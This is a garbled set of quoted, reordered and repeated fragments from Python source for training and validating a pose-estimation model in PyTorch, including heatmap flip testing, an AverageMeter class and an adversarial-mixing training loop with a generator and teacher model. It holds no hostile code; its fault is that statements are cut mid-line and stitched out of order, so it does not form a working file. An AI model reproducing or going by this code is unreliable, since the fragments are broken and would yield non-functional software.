end) outputs =", "= global_steps + 1 prefix = '{}_{}'.format(os.path.join(output_dir, 'train'), i) save_debug_images(config, input, meta, target_hm,", "target_hm, pred*4, outputs, prefix) def set_require_grad(nets, requires_grad=True): if not isinstance(nets, list): nets =", "optimizers[0] optimizer_G = optimizers[1] end = time.time() for i, (inputs, targets, 
target_weights, metas)", "criterion(D_output_detach, target, target_weight) loss_D_kd = criterion(D_output_detach, teacher_output, target_weight) loss_D = loss_D_hm * (1", "pred = accuracy(output, target, args=None, cfg=config) output = _tocuda(output) acc.update(avg_acc, cnt) batch_time.update(time.time() -", "0: msg = 'Test: [{0}/{1}]\\t' \\ 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t' \\ 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'", "# Copyright (c) Microsoft # Licensed under the MIT License. # Written by", ":, 0:2] = preds[:, :, 0:2] all_preds[idx:idx + num_images, :, 2:3] = maxvals", "(infer_end - infer_start) if isinstance(outputs, list): output = outputs[-1] else: output = outputs", "Arch ' + ' '.join(['| {}'.format(name) for name in names]) + ' |'", "= models[2].eval() else: models.train() optimizer = optimizers[0] optimizer_G = optimizers[1] end = time.time()", "logger = logging.getLogger(__name__) def train(config, args, train_loader, model, criterion, optimizer, epoch, output_dir, tb_log_dir,", "= outputs[-1] else: output = outputs if config.TEST.FLIP_TEST: input_flipped = input.flip(3) outputs_flipped =", "= AverageMeter() losses = AverageMeter() acc = AverageMeter() if isinstance(model, list): model =", "_print_name_value(name_values, model_name) if writer_dict: writer = writer_dict['writer'] global_steps = writer_dict['valid_global_steps'] writer.add_scalar( 'valid_loss', losses.avg,", "args=None, cfg=config) output = _tocuda(output) acc.update(avg_acc, cnt) batch_time.update(time.time() - end) end = time.time()", "_print_name_value(name_value, model_name) else: _print_name_value(name_values, model_name) if writer_dict: writer = writer_dict['writer'] global_steps = writer_dict['valid_global_steps']", "== 0: msg = 'Epoch: [{0}][{1}/{2}]\\t' \\ 'Time {batch_time.val:.3f}s ({batch_time.avg:.3f}s)\\t' \\ 'Speed {speed:.1f}", "list): inputs = [_.cuda(non_blocking=True) for _ in inputs] target = targets[0].cuda(non_blocking=True) target_weight =", 
"mix_weight = F.softmax(model_G(G_input), dim=1) set_require_grad(model, True) optimizer.zero_grad() tmp = inputs[0] * mix_weight[:,0,...].unsqueeze(dim=1) for", "{acc.val:.3f} ({acc.avg:.3f})'.format( i, len(val_loader), batch_time=batch_time, loss=losses, acc=acc) logger.info(msg) prefix = '{}_{}'.format( os.path.join(output_dir, 'val'),", "'{}_{}'.format(os.path.join(output_dir, 'train'), i) save_debug_images(config, inputs[0], copy.deepcopy(meta), target, pred*4, outputs, prefix + '_clean') save_debug_images(config,", "data_time = AverageMeter() losses = AverageMeter() acc = AverageMeter() if isinstance(models, list): model", "= c[:, 0:2] all_boxes[idx:idx + num_images, 2:4] = s[:, 0:2] all_boxes[idx:idx + num_images,", "global_steps + 1 prefix = '{}_{}'.format(os.path.join(output_dir, 'train'), i) save_debug_images(config, input, meta, target_hm, pred*4,", "= global_steps + 1 prefix = '{}_{}'.format(os.path.join(output_dir, 'train'), i) save_debug_images(config, inputs[0], copy.deepcopy(meta), target,", "from core.inference import get_final_preds, get_final_preds_using_softargmax, SoftArgmax2D from utils.transforms import flip_back, tofloat, coord_norm, inv_coord_norm,", "target_hm = target target_weight = target_weight.cuda(non_blocking=True) loss = criterion(outputs, target, target_weight) # compute", "np.zeros((num_samples, 6)) image_path = [] filenames = [] imgnums = [] idx =", "= input.size(0) # measure accuracy and record loss losses.update(loss.item(), num_images) _, avg_acc, cnt,", "torch from core.evaluate import accuracy from core.inference import get_final_preds, get_final_preds_using_softargmax, SoftArgmax2D from utils.transforms", "input_flipped = input.flip(3) outputs_flipped = model(input_flipped) if isinstance(outputs_flipped, list): output_flipped = outputs_flipped[-1] else:", "config, args, output.clone().cpu().numpy(), c, s) all_preds[idx:idx + num_images, :, 0:2] = preds[:, :,", "joint c = meta['center'].numpy() s = meta['scale'].numpy() 
score = meta['score'].numpy() preds, maxvals =", "coord_norm, inv_coord_norm, _tocopy, _tocuda from utils.vis import save_debug_images import torch.nn as nn from", "torch.no_grad(): end = time.time() time_gpu = 0. for i, (input, target, target_weight, meta)", "for param in net.parameters(): param.requires_grad = requires_grad def train_advmix(config, args, train_loader, models, criterion,", "train_loader, model, criterion, optimizer, epoch, output_dir, tb_log_dir, writer_dict): batch_time = AverageMeter() data_time =", "= target target_weight = target_weight.cuda(non_blocking=True) loss = criterion(outputs, target, target_weight) # compute gradient", "stores the average and current value\"\"\" def __init__(self): self.reset() def reset(self): self.val =", "outputs loss_G = -criterion(output, target, target_weight) * args.adv_loss_weight loss_G.backward() optimizer_G.step() # measure accuracy", "config.TEST.FLIP_TEST: input_flipped = input.flip(3) outputs_flipped = model(input_flipped) if isinstance(outputs_flipped, list): output_flipped = outputs_flipped[-1]", "output.clone().cpu().numpy(), c, s) all_preds[idx:idx + num_images, :, 0:2] = preds[:, :, 0:2] all_preds[idx:idx", "= targets[0].cuda(non_blocking=True) target_weight = target_weights[0].cuda(non_blocking=True) meta = metas[0] else: inputs = inputs.cuda(non_blocking=True) G_input", "= 0 self.sum = 0 self.count = 0 def update(self, val, n=1): self.val", "len(val_loader), batch_time=batch_time, loss=losses, acc=acc) logger.info(msg) prefix = '{}_{}'.format( os.path.join(output_dir, 'val'), i ) save_debug_images(config,", "if isinstance(outputs_flipped, list): output_flipped = outputs_flipped[-1] else: output_flipped = outputs_flipped output_flipped = flip_back(output_flipped.cpu().numpy(),", "(input, target, target_weight, meta) in tqdm(enumerate(train_loader)): data_time.update(time.time() - end) outputs = model(input) target", "end = time.time() # corresponding center scale joint c = meta['center'].numpy() s 
=", "by <NAME> (<EMAIL>) # ------------------------------------------------------------------------------ from __future__ import absolute_import from __future__ import division", "MIT License. # Written by <NAME> (<EMAIL>) # ------------------------------------------------------------------------------ from __future__ import absolute_import", "import torch from core.evaluate import accuracy from core.inference import get_final_preds, get_final_preds_using_softargmax, SoftArgmax2D from", "= time.time() for i, (inputs, targets, target_weights, metas) in tqdm(enumerate(train_loader)): data_time.update(time.time() - end)", "all_boxes[idx:idx + num_images, 5] = score image_path.extend(meta['image']) idx += num_images if i %", "cnt) batch_time.update(time.time() - end) end = time.time() if i % config.PRINT_FREQ == 0:", "nets = [nets] for net in nets: if net is not None: for", "'...' logger.info( '| ' + full_arch_name + ' ' + ' '.join(['| {:.3f}'.format(value)", "writer_dict['writer'] global_steps = writer_dict['train_global_steps'] writer.add_scalar('train_loss', losses.val, global_steps) writer.add_scalar('train_acc', acc.val, global_steps) writer_dict['train_global_steps'] = global_steps", "and record loss losses.update(loss.item(), num_images) _, avg_acc, cnt, pred = accuracy(output, target, args=None,", "G_input = torch.cat(inputs, dim=1) mix_weight = F.softmax(model_G(G_input), dim=1) set_require_grad(model, True) optimizer.zero_grad() tmp =", "' + ' '.join(['| {:.3f}'.format(value) for value in values]) + ' |' )", "model = models[0].train() model_G = models[1].train() model_teacher = models[2].eval() else: models.train() optimizer =", "True) optimizer.zero_grad() tmp = inputs[0] * mix_weight[:,0,...].unsqueeze(dim=1) for list_index in range(1, len(inputs)): tmp", "with torch.no_grad(): teacher_output = model_teacher(inputs[0]) loss_D_hm = criterion(D_output_detach, target, target_weight) loss_D_kd = criterion(D_output_detach,", "= target[0].cuda(non_blocking=True) 
target_hm = target target_weight = target_weight.cuda(non_blocking=True) loss = criterion(output, target, target_weight)", "val self.sum += val * n self.count += n self.avg = self.sum /", "validate(config, args, val_loader, val_dataset, model, criterion, output_dir, tb_log_dir, writer_dict=None, cpu=False): batch_time = AverageMeter()", "inputs] target = targets[0].cuda(non_blocking=True) target_weight = target_weights[0].cuda(non_blocking=True) meta = metas[0] else: inputs =", "the average and current value\"\"\" def __init__(self): self.reset() def reset(self): self.val = 0", "args, output.clone().cpu().numpy(), c, s) all_preds[idx:idx + num_images, :, 0:2] = preds[:, :, 0:2]", "\\ 'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format( epoch, i, len(train_loader), batch_time=batch_time, speed=inputs[0].size(0)/batch_time.val, data_time=data_time, loss=losses, acc=acc) logger.info(msg)", "input.flip(3) outputs_flipped = model(input_flipped) if isinstance(outputs_flipped, list): output_flipped = outputs_flipped[-1] else: output_flipped =", "and current value\"\"\" def __init__(self): self.reset() def reset(self): self.val = 0 self.avg =", "output_flipped = outputs_flipped output_flipped = flip_back(output_flipped.cpu().numpy(), val_dataset.flip_pairs) if not cpu: output_flipped = torch.from_numpy(output_flipped.copy()).cuda()", "print_function import time import logging import os, copy import numpy as np import", "as np import torch from core.evaluate import accuracy from core.inference import get_final_preds, get_final_preds_using_softargmax,", "target_weight) loss_D_kd = criterion(D_output_detach, teacher_output, target_weight) loss_D = loss_D_hm * (1 - args.alpha)", "losses.avg, global_steps ) writer.add_scalar( 'valid_acc', acc.avg, global_steps ) if isinstance(name_values, list): for name_value", "core.inference import get_final_preds, get_final_preds_using_softargmax, SoftArgmax2D from utils.transforms import flip_back, tofloat, coord_norm, inv_coord_norm, 
_tocopy,", "prefix) def validate(config, args, val_loader, val_dataset, model, criterion, output_dir, tb_log_dir, writer_dict=None, cpu=False): batch_time", "# measure accuracy and record loss losses.update(loss.item(), input.size(0)) _, avg_acc, cnt, pred =", "F logger = logging.getLogger(__name__) def train(config, args, train_loader, model, criterion, optimizer, epoch, output_dir,", "({acc.avg:.3f})'.format( epoch, i, len(train_loader), batch_time=batch_time, speed=inputs[0].size(0)/batch_time.val, data_time=data_time, loss=losses, acc=acc) logger.info(msg) writer = writer_dict['writer']", "requires_grad=True): if not isinstance(nets, list): nets = [nets] for net in nets: if", "_tocuda(outputs) acc.update(avg_acc, cnt) batch_time.update(time.time() - end) end = time.time() if i % config.PRINT_FREQ", "def __init__(self): self.reset() def reset(self): self.val = 0 self.avg = 0 self.sum =", "loss losses.update(loss.item(), input.size(0)) _, avg_acc, cnt, pred = accuracy(outputs, target, args=None, cfg=config) outputs", "meta) in tqdm(enumerate(train_loader)): data_time.update(time.time() - end) outputs = model(input) target = target[0].cuda(non_blocking=True) target_hm", "= outputs_flipped output_flipped = flip_back(output_flipped.cpu().numpy(), val_dataset.flip_pairs) if not cpu: output_flipped = torch.from_numpy(output_flipped.copy()).cuda() else:", "'Data {data_time.val:.3f}s ({data_time.avg:.3f}s)\\t' \\ 'Loss {loss.val:.5f} ({loss.avg:.5f})\\t' \\ 'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format( epoch, i,", "mix_weight[:,list_index].unsqueeze(dim=1) D_output_detach = model(tmp.detach()) with torch.no_grad(): teacher_output = model_teacher(inputs[0]) loss_D_hm = criterion(D_output_detach, target,", "save_debug_images(config, input, meta, target_hm, pred*4, outputs, prefix) def set_require_grad(nets, requires_grad=True): if not isinstance(nets,", "+ loss_D_kd * args.alpha loss_D.backward() optimizer.step() # G: compute gradient and do update", 
"criterion(D_output_detach, teacher_output, target_weight) loss_D = loss_D_hm * (1 - args.alpha) + loss_D_kd *", "\\ output_flipped.clone()[:, :, :, 0:-1] output = (output + output_flipped) * 0.5 if", "center scale joint c = meta['center'].numpy() s = meta['scale'].numpy() score = meta['score'].numpy() preds,", "+ 1 return name_values, perf_indicator # markdown format output def _print_name_value(name_value, full_arch_name): names", "args=None, cfg=config) acc.update(avg_acc, cnt) batch_time.update(time.time() - end) end = time.time() if i %", "cfg=config) acc.update(avg_acc, cnt) batch_time.update(time.time() - end) end = time.time() if i % config.PRINT_FREQ", "update(self, val, n=1): self.val = val self.sum += val * n self.count +=", "<gh_stars>10-100 # ------------------------------------------------------------------------------ # Copyright (c) Microsoft # Licensed under the MIT License.", "copy import numpy as np import torch from core.evaluate import accuracy from core.inference", "if isinstance(model, list): model = model[0].train() model_D = model[1].train() else: model.train() end =", "logger.info(msg) writer = writer_dict['writer'] global_steps = writer_dict['train_global_steps'] writer.add_scalar('train_loss', losses.val, global_steps) writer.add_scalar('train_acc', acc.val, global_steps)", "+ 1 prefix = '{}_{}'.format(os.path.join(output_dir, 'train'), i) save_debug_images(config, input, meta, target_hm, pred*4, outputs,", "output = (output + output_flipped) * 0.5 if not cpu: target = target[0].cuda(non_blocking=True)", "value\"\"\" def __init__(self): self.reset() def reset(self): self.val = 0 self.avg = 0 self.sum", "+= n self.avg = self.sum / self.count if self.count != 0 else 0", "losses.update(loss_D.item(), inputs[0].size(0)) _, avg_acc, cnt, pred = accuracy(output, target, args=None, cfg=config) acc.update(avg_acc, cnt)", "AverageMeter() data_time = AverageMeter() losses = AverageMeter() acc = AverageMeter() if isinstance(model, list):", "record 
loss losses.update(loss.item(), num_images) _, avg_acc, cnt, pred = accuracy(output, target, args=None, cfg=config)", "isinstance(inputs, list): inputs = [_.cuda(non_blocking=True) for _ in inputs] target = targets[0].cuda(non_blocking=True) target_weight", "metas[0] else: inputs = inputs.cuda(non_blocking=True) G_input = torch.cat(inputs, dim=1) mix_weight = F.softmax(model_G(G_input), dim=1)", "list): output_flipped = outputs_flipped[-1] else: output_flipped = outputs_flipped output_flipped = flip_back(output_flipped.cpu().numpy(), val_dataset.flip_pairs) if", "meta, target_hm, pred * 4, output, prefix) print('=> The average inference time is", "acc.update(avg_acc, cnt) batch_time.update(time.time() - end) end = time.time() # corresponding center scale joint", "'valid_acc', acc.avg, global_steps ) if isinstance(name_values, list): for name_value in name_values: writer.add_scalars( 'valid',", "markdown format output def _print_name_value(name_value, full_arch_name): names = name_value.keys() values = name_value.values() num_values", "' '.join(['| {:.3f}'.format(value) for value in values]) + ' |' ) class AverageMeter(object):", "= meta['score'].numpy() preds, maxvals = get_final_preds( config, args, output.clone().cpu().numpy(), c, s) all_preds[idx:idx +", "2:4] = s[:, 0:2] all_boxes[idx:idx + num_images, 4] = np.prod(s*200, 1) all_boxes[idx:idx +", "(input, target, target_weight, meta) in tqdm(enumerate(val_loader)): if not cpu: input = input.cuda() #", "(num_samples, config.MODEL.NUM_JOINTS, 3), dtype=np.float32 ) all_boxes = np.zeros((num_samples, 6)) image_path = [] filenames", "= s[:, 0:2] all_boxes[idx:idx + num_images, 4] = np.prod(s*200, 1) all_boxes[idx:idx + num_images,", "net in nets: if net is not None: for param in net.parameters(): param.requires_grad", "loss losses.update(loss.item(), num_images) _, avg_acc, cnt, pred = accuracy(output, target, args=None, cfg=config) output", "= _tocuda(outputs) acc.update(avg_acc, cnt) batch_time.update(time.time() 
- end) end = time.time() if i %", "target target_weight = target_weight.cuda(non_blocking=True) loss = criterion(output, target, target_weight) num_images = input.size(0) #", "meta['center'].numpy() s = meta['scale'].numpy() score = meta['score'].numpy() preds, maxvals = get_final_preds( config, args,", "if len(full_arch_name) > 15: full_arch_name = full_arch_name[:8] + '...' logger.info( '| ' +", "num_images = input.size(0) # measure accuracy and record loss losses.update(loss.item(), num_images) _, avg_acc,", "outputs, prefix) def validate(config, args, val_loader, val_dataset, model, criterion, output_dir, tb_log_dir, writer_dict=None, cpu=False):", "inputs.cuda(non_blocking=True) G_input = torch.cat(inputs, dim=1) mix_weight = F.softmax(model_G(G_input), dim=1) set_require_grad(model, True) optimizer.zero_grad() tmp", "output = outputs[-1] else: output = outputs if config.TEST.FLIP_TEST: input_flipped = input.flip(3) outputs_flipped", ":, 0:2] all_preds[idx:idx + num_images, :, 2:3] = maxvals # double check this", "numpy as np import torch from core.evaluate import accuracy from core.inference import get_final_preds,", "set_require_grad(nets, requires_grad=True): if not isinstance(nets, list): nets = [nets] for net in nets:", "= 0 def update(self, val, n=1): self.val = val self.sum += val *", "\\ 'Time {batch_time.val:.3f}s ({batch_time.avg:.3f}s)\\t' \\ 'Speed {speed:.1f} samples/s\\t' \\ 'Data {data_time.val:.3f}s ({data_time.avg:.3f}s)\\t' \\", "= preds[:, :, 0:2] all_preds[idx:idx + num_images, :, 2:3] = maxvals # double", "s[:, 0:2] all_boxes[idx:idx + num_images, 4] = np.prod(s*200, 1) all_boxes[idx:idx + num_images, 5]", "infer_start = time.time() outputs = model(input) infer_end = time.time() torch.cuda.synchronize() time_gpu += (infer_end", "target = targets[0].cuda(non_blocking=True) target_weight = target_weights[0].cuda(non_blocking=True) meta = metas[0] else: inputs = inputs.cuda(non_blocking=True)", ":, :, 0:-1] output = (output + output_flipped) 
* 0.5 if not cpu:", "len(inputs)): tmp += inputs[list_index] * mix_weight[:,list_index].unsqueeze(dim=1) D_output_detach = model(tmp.detach()) with torch.no_grad(): teacher_output =", "in name_values: _print_name_value(name_value, model_name) else: _print_name_value(name_values, model_name) if writer_dict: writer = writer_dict['writer'] global_steps", "def train_advmix(config, args, train_loader, models, criterion, optimizers, epoch, output_dir, tb_log_dir, writer_dict): batch_time =", "net is not None: for param in net.parameters(): param.requires_grad = requires_grad def train_advmix(config,", "inputs[list_index] * mix_weight[:,list_index].unsqueeze(dim=1) D_output_detach = model(tmp.detach()) with torch.no_grad(): teacher_output = model_teacher(inputs[0]) loss_D_hm =", "optimizer_G.step() # measure accuracy and record loss losses.update(loss_D.item(), inputs[0].size(0)) _, avg_acc, cnt, pred", "parts all_boxes[idx:idx + num_images, 0:2] = c[:, 0:2] all_boxes[idx:idx + num_images, 2:4] =", "= target target_weight = target_weight.cuda(non_blocking=True) loss = criterion(output, target, target_weight) num_images = input.size(0)", "format output def _print_name_value(name_value, full_arch_name): names = name_value.keys() values = name_value.values() num_values =", "= name_value.keys() values = name_value.values() num_values = len(name_value) logger.info( '| Arch ' +", "speed=input.size(0)/batch_time.val, data_time=data_time, loss=losses, acc=acc) logger.info(msg) writer = writer_dict['writer'] global_steps = writer_dict['train_global_steps'] writer.add_scalar('train_loss', losses.val,", "target_weight) num_images = input.size(0) # measure accuracy and record loss losses.update(loss.item(), num_images) _,", "[] idx = 0 feat_dict = {} with torch.no_grad(): end = time.time() time_gpu", "'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format( i, len(val_loader), batch_time=batch_time, loss=losses, acc=acc) logger.info(msg) prefix = '{}_{}'.format( os.path.join(output_dir,", 
"time.time() torch.cuda.synchronize() time_gpu += (infer_end - infer_start) if isinstance(outputs, list): output = outputs[-1]", "utils.transforms import flip_back, tofloat, coord_norm, inv_coord_norm, _tocopy, _tocuda from utils.vis import save_debug_images import", "name_value.values() num_values = len(name_value) logger.info( '| Arch ' + ' '.join(['| {}'.format(name) for", "epoch, i, len(train_loader), batch_time=batch_time, speed=input.size(0)/batch_time.val, data_time=data_time, loss=losses, acc=acc) logger.info(msg) writer = writer_dict['writer'] global_steps", "= loss_D_hm * (1 - args.alpha) + loss_D_kd * args.alpha loss_D.backward() optimizer.step() #", "absolute_import from __future__ import division from __future__ import print_function import time import logging", "AverageMeter() acc = AverageMeter() # switch to evaluate mode model.eval() num_samples = len(val_dataset)", "Written by <NAME> (<EMAIL>) # ------------------------------------------------------------------------------ from __future__ import absolute_import from __future__ import", "time.time() time_gpu = 0. 
for i, (input, target, target_weight, meta) in tqdm(enumerate(val_loader)): if", "heatmap for higher accuracy if config.TEST.SHIFT_HEATMAP: output_flipped[:, :, :, 1:] = \\ output_flipped.clone()[:,", "writer.add_scalars( 'valid', dict(name_value), global_steps ) else: writer.add_scalars( 'valid', dict(name_values), global_steps ) writer_dict['valid_global_steps'] =", "logger.info('|---' * (num_values+1) + '|') if len(full_arch_name) > 15: full_arch_name = full_arch_name[:8] +", "logging.getLogger(__name__) def train(config, args, train_loader, model, criterion, optimizer, epoch, output_dir, tb_log_dir, writer_dict): batch_time", "'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format( epoch, i, len(train_loader), batch_time=batch_time, speed=input.size(0)/batch_time.val, data_time=data_time, loss=losses, acc=acc) logger.info(msg) writer", "msg = 'Epoch: [{0}][{1}/{2}]\\t' \\ 'Time {batch_time.val:.3f}s ({batch_time.avg:.3f}s)\\t' \\ 'Speed {speed:.1f} samples/s\\t' \\", "= AverageMeter() losses = AverageMeter() acc = AverageMeter() if isinstance(models, list): model =", "= criterion(D_output_detach, teacher_output, target_weight) loss_D = loss_D_hm * (1 - args.alpha) + loss_D_kd", "accuracy from core.inference import get_final_preds, get_final_preds_using_softargmax, SoftArgmax2D from utils.transforms import flip_back, tofloat, coord_norm,", "step set_require_grad(model, False) optimizer_G.zero_grad() outputs = model(tmp) output = outputs loss_G = -criterion(output,", "- end) end = time.time() # corresponding center scale joint c = meta['center'].numpy()", "model_name = config.MODEL.NAME if isinstance(name_values, list): for name_value in name_values: _print_name_value(name_value, model_name) else:", "values]) + ' |' ) class AverageMeter(object): \"\"\"Computes and stores the average and", "= AverageMeter() data_time = AverageMeter() losses = AverageMeter() acc = AverageMeter() if isinstance(models,", ") class AverageMeter(object): \"\"\"Computes and stores the average 
and current value\"\"\" def __init__(self):", "0: msg = 'Epoch: [{0}][{1}/{2}]\\t' \\ 'Time {batch_time.val:.3f}s ({batch_time.avg:.3f}s)\\t' \\ 'Speed {speed:.1f} samples/s\\t'", "all_boxes[idx:idx + num_images, 2:4] = s[:, 0:2] all_boxes[idx:idx + num_images, 4] = np.prod(s*200,", "self.sum += val * n self.count += n self.avg = self.sum / self.count", "/ len(val_loader)) name_values, perf_indicator = val_dataset.evaluate( config, all_preds, output_dir, all_boxes, image_path, filenames, imgnums", "input, meta, target_hm, pred * 4, output, prefix) print('=> The average inference time", "= 0 self.avg = 0 self.sum = 0 self.count = 0 def update(self,", "target[0].cuda(non_blocking=True) target_hm = target target_weight = target_weight.cuda(non_blocking=True) loss = criterion(output, target, target_weight) num_images", "utils.vis import save_debug_images import torch.nn as nn from tqdm import tqdm import torch.nn.functional", "{acc.val:.3f} ({acc.avg:.3f})'.format( epoch, i, len(train_loader), batch_time=batch_time, speed=input.size(0)/batch_time.val, data_time=data_time, loss=losses, acc=acc) logger.info(msg) writer =", "= AverageMeter() acc = AverageMeter() if isinstance(model, list): model = model[0].train() model_D =", "= model[0].train() model_D = model[1].train() else: model.train() end = time.time() for i, (input,", "losses.val, global_steps) writer.add_scalar('train_acc', acc.val, global_steps) writer_dict['train_global_steps'] = global_steps + 1 prefix = '{}_{}'.format(os.path.join(output_dir,", "output_flipped = torch.from_numpy(output_flipped.copy()).cuda() else: output_flipped = torch.from_numpy(output_flipped.copy()) # feature is not aligned, shift", "target_weight = target_weight.cuda(non_blocking=True) loss = criterion(outputs, target, target_weight) # compute gradient and do", "full_arch_name + ' ' + ' '.join(['| {:.3f}'.format(value) for value in values]) +", "from utils.vis import save_debug_images import torch.nn as nn from tqdm import tqdm import", 
"[_.cuda(non_blocking=True) for _ in inputs] target = targets[0].cuda(non_blocking=True) target_weight = target_weights[0].cuda(non_blocking=True) meta =", "as nn from tqdm import tqdm import torch.nn.functional as F logger = logging.getLogger(__name__)", "criterion, optimizers, epoch, output_dir, tb_log_dir, writer_dict): batch_time = AverageMeter() data_time = AverageMeter() losses", "= models[0].train() model_G = models[1].train() model_teacher = models[2].eval() else: models.train() optimizer = optimizers[0]", "model(input) target = target[0].cuda(non_blocking=True) target_hm = target target_weight = target_weight.cuda(non_blocking=True) loss = criterion(outputs,", "False) optimizer_G.zero_grad() outputs = model(tmp) output = outputs loss_G = -criterion(output, target, target_weight)", "torch.from_numpy(output_flipped.copy()) # feature is not aligned, shift flipped heatmap for higher accuracy if", "i % config.PRINT_FREQ == 0: msg = 'Test: [{0}/{1}]\\t' \\ 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'", "% config.PRINT_FREQ == 0: msg = 'Test: [{0}/{1}]\\t' \\ 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t' \\", "dict(name_values), global_steps ) writer_dict['valid_global_steps'] = global_steps + 1 return name_values, perf_indicator # markdown", "'| ' + full_arch_name + ' ' + ' '.join(['| {:.3f}'.format(value) for value", "+ full_arch_name + ' ' + ' '.join(['| {:.3f}'.format(value) for value in values])", "outputs_flipped = model(input_flipped) if isinstance(outputs_flipped, list): output_flipped = outputs_flipped[-1] else: output_flipped = outputs_flipped", "= outputs loss_G = -criterion(output, target, target_weight) * args.adv_loss_weight loss_G.backward() optimizer_G.step() # measure", "cnt, pred = accuracy(output, target, args=None, cfg=config) acc.update(avg_acc, cnt) batch_time.update(time.time() - end) end", "= _tocuda(output) acc.update(avg_acc, cnt) batch_time.update(time.time() - end) end = time.time() # corresponding center", "self.val = 
0 self.avg = 0 self.sum = 0 self.count = 0 def", "= np.zeros((num_samples, 6)) image_path = [] filenames = [] imgnums = [] idx", "dim=1) set_require_grad(model, True) optimizer.zero_grad() tmp = inputs[0] * mix_weight[:,0,...].unsqueeze(dim=1) for list_index in range(1,", "epoch, i, len(train_loader), batch_time=batch_time, speed=inputs[0].size(0)/batch_time.val, data_time=data_time, loss=losses, acc=acc) logger.info(msg) writer = writer_dict['writer'] global_steps", "and stores the average and current value\"\"\" def __init__(self): self.reset() def reset(self): self.val", "import flip_back, tofloat, coord_norm, inv_coord_norm, _tocopy, _tocuda from utils.vis import save_debug_images import torch.nn", "input.size(0)) _, avg_acc, cnt, pred = accuracy(outputs, target, args=None, cfg=config) outputs = _tocuda(outputs)", "output_flipped[:, :, :, 1:] = \\ output_flipped.clone()[:, :, :, 0:-1] output = (output", "not cpu: target = target[0].cuda(non_blocking=True) target_hm = target target_weight = target_weight.cuda(non_blocking=True) loss =", "if config.TEST.SHIFT_HEATMAP: output_flipped[:, :, :, 1:] = \\ output_flipped.clone()[:, :, :, 0:-1] output", "num_images, :, 0:2] = preds[:, :, 0:2] all_preds[idx:idx + num_images, :, 2:3] =", "+ num_images, 2:4] = s[:, 0:2] all_boxes[idx:idx + num_images, 4] = np.prod(s*200, 1)", "list): model = models[0].train() model_G = models[1].train() model_teacher = models[2].eval() else: models.train() optimizer", "AverageMeter() data_time = AverageMeter() losses = AverageMeter() acc = AverageMeter() if isinstance(models, list):", "0 feat_dict = {} with torch.no_grad(): end = time.time() time_gpu = 0. 
for", "np.prod(s*200, 1) all_boxes[idx:idx + num_images, 5] = score image_path.extend(meta['image']) idx += num_images if", "F.softmax(model_G(G_input), dim=1) set_require_grad(model, True) optimizer.zero_grad() tmp = inputs[0] * mix_weight[:,0,...].unsqueeze(dim=1) for list_index in", "inputs = [_.cuda(non_blocking=True) for _ in inputs] target = targets[0].cuda(non_blocking=True) target_weight = target_weights[0].cuda(non_blocking=True)", "|' ) class AverageMeter(object): \"\"\"Computes and stores the average and current value\"\"\" def", "{} with torch.no_grad(): end = time.time() time_gpu = 0. for i, (input, target,", "else: inputs = inputs.cuda(non_blocking=True) G_input = torch.cat(inputs, dim=1) mix_weight = F.softmax(model_G(G_input), dim=1) set_require_grad(model,", "all_preds = np.zeros( (num_samples, config.MODEL.NUM_JOINTS, 3), dtype=np.float32 ) all_boxes = np.zeros((num_samples, 6)) image_path", "0 self.sum = 0 self.count = 0 def update(self, val, n=1): self.val =", "' |' ) class AverageMeter(object): \"\"\"Computes and stores the average and current value\"\"\"", "do update step set_require_grad(model, False) optimizer_G.zero_grad() outputs = model(tmp) output = outputs loss_G", "isinstance(name_values, list): for name_value in name_values: writer.add_scalars( 'valid', dict(name_value), global_steps ) else: writer.add_scalars(", "(inputs, targets, target_weights, metas) in tqdm(enumerate(train_loader)): data_time.update(time.time() - end) # mask_channel = meta['model_supervise_channel']", "len(train_loader), batch_time=batch_time, speed=input.size(0)/batch_time.val, data_time=data_time, loss=losses, acc=acc) logger.info(msg) writer = writer_dict['writer'] global_steps = writer_dict['train_global_steps']", "[nets] for net in nets: if net is not None: for param in", "all_preds[idx:idx + num_images, :, 0:2] = preds[:, :, 0:2] all_preds[idx:idx + num_images, :,", "target_hm, pred * 4, output, prefix) print('=> The average inference time is :',", "_tocuda 
from utils.vis import save_debug_images import torch.nn as nn from tqdm import tqdm", ") if isinstance(name_values, list): for name_value in name_values: writer.add_scalars( 'valid', dict(name_value), global_steps )", "imgnums = [] idx = 0 feat_dict = {} with torch.no_grad(): end =", "writer_dict['train_global_steps'] = global_steps + 1 prefix = '{}_{}'.format(os.path.join(output_dir, 'train'), i) save_debug_images(config, inputs[0], copy.deepcopy(meta),", "global_steps ) writer.add_scalar( 'valid_acc', acc.avg, global_steps ) if isinstance(name_values, list): for name_value in", "args.alpha loss_D.backward() optimizer.step() # G: compute gradient and do update step set_require_grad(model, False)", "infer_start) if isinstance(outputs, list): output = outputs[-1] else: output = outputs if config.TEST.FLIP_TEST:", "output_flipped) * 0.5 if not cpu: target = target[0].cuda(non_blocking=True) target_hm = target target_weight", "- args.alpha) + loss_D_kd * args.alpha loss_D.backward() optimizer.step() # G: compute gradient and", "name_values: _print_name_value(name_value, model_name) else: _print_name_value(name_values, model_name) if writer_dict: writer = writer_dict['writer'] global_steps =", "1 return name_values, perf_indicator # markdown format output def _print_name_value(name_value, full_arch_name): names =", "target, args=None, cfg=config) acc.update(avg_acc, cnt) batch_time.update(time.time() - end) end = time.time() if i", "acc.update(avg_acc, cnt) batch_time.update(time.time() - end) end = time.time() if i % config.PRINT_FREQ ==", ":, 0:-1] output = (output + output_flipped) * 0.5 if not cpu: target", "cnt, pred = accuracy(output, target, args=None, cfg=config) output = _tocuda(output) acc.update(avg_acc, cnt) batch_time.update(time.time()", "corresponding center scale joint c = meta['center'].numpy() s = meta['scale'].numpy() score = meta['score'].numpy()", "name_values, perf_indicator # markdown format output def _print_name_value(name_value, 
